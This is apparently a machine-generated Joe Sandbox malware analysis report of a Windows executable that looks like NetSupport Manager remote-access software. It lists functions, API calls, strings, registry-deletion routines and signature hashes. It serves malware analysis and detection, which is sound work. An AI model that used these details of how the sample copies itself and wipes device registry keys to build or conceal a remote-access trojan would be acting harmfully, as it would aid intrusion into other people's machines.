                                                                                          • Instruction ID: 13f0292098e4b7aa5d93e177f19ba8eec67ef0e4273a8b8a02ebe8ef1ec36d26
                                                                                          • Opcode Fuzzy Hash: 270d710013cd075e8ddd728d170dac858c917f81193d488636adabdc7db59c69
                                                                                          • Instruction Fuzzy Hash: 3C51DAB1C003655ADB34AB618D476BF7AF4BFA5344F044469FC89A3141F635DE80C7A1
                                                                                          Function 005DE633 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 153sleepwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000100,0063CB80), ref: 005DE682
                                                                                          • PostMessageW.USER32(?,000003E1,?,00000000), ref: 005DEDE1
                                                                                          • DestroyWindow.USER32(?), ref: 005DEDEE
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005DEE58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentDestroyDirectoryMessagePostSleepWindow
                                                                                          • String ID: Created main window %08x$Done:$Exit$OK$Restart$winexec.ok
                                                                                          • API String ID: 2846396082-3127719662
                                                                                          • Opcode ID: 7b5f66840a49288f67ba45a63d8612b2b5f4b992a8d545158982e6c31af8a5ac
                                                                                          • Instruction ID: 58960135b0f5fc6f7422d1e3e757d1bb92b5fb2b5562db82f1a38f34fcd91c45
                                                                                          • Opcode Fuzzy Hash: 7b5f66840a49288f67ba45a63d8612b2b5f4b992a8d545158982e6c31af8a5ac
                                                                                          • Instruction Fuzzy Hash: CC512B75D402119BCB30BB6CAC9BA693AA6FB41350B09452BF4869F3D1EB704980CBA1
                                                                                          Function 005E0F65 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 138fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005E0F96
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005E1037
                                                                                          • GetLastError.KERNEL32 ref: 005E104B
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005E10DA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Copy$ErrorLastModuleName
                                                                                          • String ID: .new$Copy %s to %s$Copy failed - pcigina in use$pcigina
                                                                                          • API String ID: 2850203897-1136079111
                                                                                          • Opcode ID: 9a000248b8611d2f82c1274d8262b3fa31f75ce80306c4d27240a20f8a1d20d9
                                                                                          • Instruction ID: 61d2f1992c31491d0396c4614eb091939cb544ff2f2d116f7abc9d38473aae7e
                                                                                          • Opcode Fuzzy Hash: 9a000248b8611d2f82c1274d8262b3fa31f75ce80306c4d27240a20f8a1d20d9
                                                                                          • Instruction Fuzzy Hash: B04127B6A0021987CB34AB55CD56BEA77B5FF94304F0484A9EB4B972C1EA704E81CB90
                                                                                          Function 005D2440 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • RegOpenKeyW.ADVAPI32(80000002,00621B70,?), ref: 005D247C
                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000041), ref: 005D24AE
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 005D24ED
                                                                                          • RegDeleteValueW.ADVAPI32(?,00621B58), ref: 005D251E
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D25A3
                                                                                          • RegEnumKeyW.ADVAPI32(?,00000001,?,00000041), ref: 005D25BA
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D25D1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEnumOpenwsprintf$DeleteLocalTimeValuewvsprintf
                                                                                          • String ID: HackNetMeeting
                                                                                          • API String ID: 1897349547-1163810582
                                                                                          • Opcode ID: fa2d758125f1263f30b4ebde6d1435fe301cdb8a572c49c6b1c01f60ca8e811e
                                                                                          • Instruction ID: 3100bd566df30aa1d5248c2fcbd51078d68231b32f5c9eb9a7b8fab45ad7ab5d
                                                                                          • Opcode Fuzzy Hash: fa2d758125f1263f30b4ebde6d1435fe301cdb8a572c49c6b1c01f60ca8e811e
                                                                                          • Instruction Fuzzy Hash: 76418471A00219AFDB24DB65DC56FEA7779FB58701F00809EB60997240DB70AE85CFA0
                                                                                          Function 005AE5E0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 124libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(USER32), ref: 005AE5F9
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 005AE61B
                                                                                          • EnumDisplaySettingsW.USER32(00000000,000000FF,?), ref: 005AE654
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005AE65F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressDisplayEnumFreeLoadProcSettings
                                                                                          • String ID: EnumDisplayDevicesW$USER32$gdihook5$pci gdihook5
                                                                                          • API String ID: 3246608883-4052134795
                                                                                          • Opcode ID: 10a9b9258b4bb03a73927befe05a261130166e90772657d62ca8c2bff03bbbea
                                                                                          • Instruction ID: 57943ad89204aa95665d1105a5d750f18f6257a6d45440062d7ff55e1034c1c9
                                                                                          • Opcode Fuzzy Hash: 10a9b9258b4bb03a73927befe05a261130166e90772657d62ca8c2bff03bbbea
                                                                                          • Instruction Fuzzy Hash: E9311971A0030967DB14AFA5AC9BFEE7BA9FF45760F040469F90DD71C1EE719A00CAA1
                                                                                          Function 005DEA85 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 114sleepwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000100,0063CB80), ref: 005DE682
                                                                                          • PostMessageW.USER32(?,000003E1,?,00000000), ref: 005DEDE1
                                                                                          • DestroyWindow.USER32(?), ref: 005DEDEE
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005DEE58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentDestroyDirectoryMessagePostSleepWindow
                                                                                          • String ID: Created main window %08x$Done:$Exit$OK$Restart$winexec.ok
                                                                                          • API String ID: 2846396082-3127719662
                                                                                          • Opcode ID: c19f0619e9683a7a8c6fa1c605c7baecf0c277809ff3c7bbc0c27e664ad4d816
                                                                                          • Instruction ID: df2c617e2a0e1895b748294c211a361d609e2ae589041088f69138095c478605
                                                                                          • Opcode Fuzzy Hash: c19f0619e9683a7a8c6fa1c605c7baecf0c277809ff3c7bbc0c27e664ad4d816
                                                                                          • Instruction Fuzzy Hash: 5341E7B5D40212DBDB30BF68BC9BA597BB2FB55341B08542BF4479B391EB704980CBA1
                                                                                          Function 005CEDB0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 104processsynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005C8BC0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005C8C1C
                                                                                            • Part of subcall function 005C8BC0: SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 005C8C5F
                                                                                            • Part of subcall function 005C8BC0: SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 005C8CB7
                                                                                          • wsprintfW.USER32 ref: 005CEDEC
                                                                                          • PlaySoundW.WINMM(?,?,?), ref: 005CEED8
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • wsprintfW.USER32 ref: 005CEE43
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 005CEE88
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005CEEA0
                                                                                          • CloseHandle.KERNEL32(?), ref: 005CEEB3
                                                                                          • CloseHandle.KERNEL32(?), ref: 005CEEBC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseFolderHandlePathwsprintf$CreateFileModuleNameObjectOpenPlayProcessSingleSoundVersionWait
                                                                                          • String ID: %s %s$%sPlaySound.exe$D
                                                                                          • API String ID: 2077281104-2983100991
                                                                                          • Opcode ID: ea1eba8eecb28272d2fede66863d744b5ade5b572a60cd98aee3faedd64adef5
                                                                                          • Instruction ID: cbbfcb131c8db2dc1430d745e99cbaf692fbb622b12c551fdd8bb55df48ae676
                                                                                          • Opcode Fuzzy Hash: ea1eba8eecb28272d2fede66863d744b5ade5b572a60cd98aee3faedd64adef5
                                                                                          • Instruction Fuzzy Hash: 9331B871A403186BDB20DFA4DC4BFEA777DABC4710F144199BA09A61C1DA71AE14CFA0
                                                                                          Function 005AB1D0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 63registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\DeviceClasses,00000000,0002001F,?), ref: 005AB1F1
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AB224
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Enum,00000000,0002001F,?), ref: 005AB24B
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AB278
                                                                                            • Part of subcall function 005AB0E0: RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 005AB10B
                                                                                            • Part of subcall function 005AB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 005AB14B
                                                                                            • Part of subcall function 005AB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,?), ref: 005AB196
                                                                                            • Part of subcall function 005AB0E0: RegCloseKey.ADVAPI32(?), ref: 005AB1A3
                                                                                            • Part of subcall function 005AB0E0: RegDeleteKeyW.ADVAPI32(?,?), ref: 005AB1AB
                                                                                          Strings
                                                                                          • {6B1D1EAB-FF54-4ee9-B9EE-E297404C12A5}, xrefs: 005AB254
                                                                                          • SYSTEM\CurrentControlSet\Enum, xrefs: 005AB241
                                                                                          • {7a0787c8-fa7e-4c06-861d-593b3129b14c}, xrefs: 005AB200
                                                                                          • RecurseDeleteKey FAILED (%d), xrefs: 005AB213, 005AB267
                                                                                          • SYSTEM\CurrentControlSet\Control\DeviceClasses, xrefs: 005AB1E7
                                                                                          • Failed to open key: HKLM\SYSTEM\CurrentControlSet\Control\DeviceClasses (%d), xrefs: 005AB229
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpen$Enum$Delete
                                                                                          • String ID: Failed to open key: HKLM\SYSTEM\CurrentControlSet\Control\DeviceClasses (%d)$RecurseDeleteKey FAILED (%d)$SYSTEM\CurrentControlSet\Control\DeviceClasses$SYSTEM\CurrentControlSet\Enum${6B1D1EAB-FF54-4ee9-B9EE-E297404C12A5}${7a0787c8-fa7e-4c06-861d-593b3129b14c}
                                                                                          • API String ID: 3515798135-1050689862
                                                                                          • Opcode ID: f62cdee2aebe5c6654acc870f4f90f135eab463dca5c3597fb927e47ea6d3c96
                                                                                          • Instruction ID: 5ef4cb50c146a49d62ccae50d93e1b532178ec3eb4f3b682b754b8a87775d183
                                                                                          • Opcode Fuzzy Hash: f62cdee2aebe5c6654acc870f4f90f135eab463dca5c3597fb927e47ea6d3c96
                                                                                          • Instruction Fuzzy Hash: 2A010C6AA40209B6FA1096A56C03FFF7A2DEF89742F190015FE04A1183E761AE005BF1
                                                                                          Function 0059ED80 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 38libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(USER32,?,?,005AEA6F), ref: 0059ED89
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0059ED9D
                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 0059EDAA
                                                                                          • GetProcAddress.KERNEL32(?,EnumDisplayDevicesW), ref: 0059EDB7
                                                                                          • GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 0059EDC4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoW$MonitorFromRect$USER32
                                                                                          • API String ID: 2238633743-2044714463
                                                                                          • Opcode ID: e4232d080769e30891d01087cf36d3e28543d33dd8d5bcaba49fdf7acdb126b0
                                                                                          • Instruction ID: ae2c10dabf26fcf51c6c434039795accf3189ed5b4b6b5049d5d9ef4153e98f5
                                                                                          • Opcode Fuzzy Hash: e4232d080769e30891d01087cf36d3e28543d33dd8d5bcaba49fdf7acdb126b0
                                                                                          • Instruction Fuzzy Hash: 1EF068716413005BC720EFF99D45E87F7E9AF84710B15481EF199D3290D674A4808F95
                                                                                          Function 005B9060 Relevance: 16.8, APIs: 11, Instructions: 288COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 005B9091
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B90A1
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B914E
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B9155
                                                                                          • DeleteObject.GDI32(?), ref: 005B917C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Global$Object$DeleteFreeLockUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 1970483154-0
                                                                                          • Opcode ID: 8ada1d132e757a7269e1de3584ad9ad48dbcb44fd6af18521b8f622b000d4c6b
                                                                                          • Instruction ID: e2f1e95bf9d5f39891f803b8ee3520b9f3d8ebd5c027dd1cc566409c6314de63
                                                                                          • Opcode Fuzzy Hash: 8ada1d132e757a7269e1de3584ad9ad48dbcb44fd6af18521b8f622b000d4c6b
                                                                                          • Instruction Fuzzy Hash: 86B1D571E0425AAFCB05CFA8D8959EEFFF5BF59300F088099E844AB351C634E905CBA0
                                                                                          Function 005CADE0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 005CAE46
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 005CAE67
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005CAE7C
                                                                                          • FreeLibrary.KERNEL32(?), ref: 005CAE87
                                                                                          • GetDC.USER32(?), ref: 005CAE92
                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 005CAE9D
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 005CAEA7
                                                                                            • Part of subcall function 005C2030: LoadLibraryW.KERNEL32(User32.dll,00000000,005CAE2C), ref: 005C2038
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$CapsDeviceErrorFreeLastLoadOpenReleaseVersion
                                                                                          • String ID: GetDpiForSystem$GetDpiForWindow
                                                                                          • API String ID: 4015621620-1626071520
                                                                                          • Opcode ID: 1c7273fc0afbacb812304dca780f03dcdeb498e2613c45b2d877ad5e8b8dd291
                                                                                          • Instruction ID: 034073c5edb28f5e9f05aca133d226c9d0da9ee862fa101ad877982e03bcf7ab
                                                                                          • Opcode Fuzzy Hash: 1c7273fc0afbacb812304dca780f03dcdeb498e2613c45b2d877ad5e8b8dd291
                                                                                          • Instruction Fuzzy Hash: F941D432E442189FD7259BA8E885BADFFA9F744B25F10866FEC19D3680DA35580087E1
                                                                                          Function 005CC04E Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 143COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStockObject.GDI32(0000000D), ref: 005CC104
                                                                                          • GetObjectW.GDI32(00000000,0000005C,?), ref: 005CC116
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 005CC208
                                                                                          Strings
                                                                                          • ..\CTL32\util.cpp, xrefs: 005CC21C
                                                                                          • IsA(), xrefs: 005CC1C6
                                                                                          • e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h, xrefs: 005CC1C1
                                                                                          • hSubstitutedFont, xrefs: 005CC221
                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 005CC195
                                                                                          • MS Shell Dlg, xrefs: 005CC16F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$CreateFontIndirectStock
                                                                                          • String ID: ..\CTL32\util.cpp$IsA()$MS Shell Dlg$Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$hSubstitutedFont
                                                                                          • API String ID: 3061784605-3700668608
                                                                                          • Opcode ID: 757db56952376707f4f9dead897f2261d43ab98c37ea75099427abddee80bfc0
                                                                                          • Instruction ID: 2c32db863538ce9f0e39406ac9d7cdf5794dacd5f3a19858f8e1d73071ce52b3
                                                                                          • Opcode Fuzzy Hash: 757db56952376707f4f9dead897f2261d43ab98c37ea75099427abddee80bfc0
                                                                                          • Instruction Fuzzy Hash: E841AE749006099EDB20DBE4DC6AFEEBFB5FF59700F544119E855AB282E7705A04CB50
                                                                                          Function 00598020 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 122registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,DE64E134), ref: 0059805D
                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?), ref: 005980E5
                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00598154
                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00598168
